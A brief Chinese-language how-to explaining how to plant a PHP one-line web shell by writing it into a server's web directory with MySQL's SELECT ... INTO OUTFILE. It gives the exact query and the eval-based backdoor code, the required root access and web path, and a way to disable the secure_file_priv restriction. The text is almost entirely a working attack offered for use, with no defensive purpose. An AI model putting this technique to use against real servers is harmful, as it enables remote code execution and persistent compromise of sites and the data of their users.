通过mysql写入php一句话木马

 利用mysql写入一句话木马

前提：

　　root权限，知道了服务器的web的绝对路径

select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\WWW\\22.php"

如果执行成功，生成D:\WWW\22.php，并写入

<?php @eval($_POST['pass']);?>

如果出现：

　　提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法

是mysql设置的权限的问题

mysql对通过文件导入导出作了限制，默认不允许

show variables like '%secure%';

修改my.ini

secure_auth = ON
secure_file_priv = ""

注意：　

　　1、绝对路径的猜解

　　2、INTO OUTFILE 后面的"D:\\WWW\\22.php"(对反斜杠做了一次转义)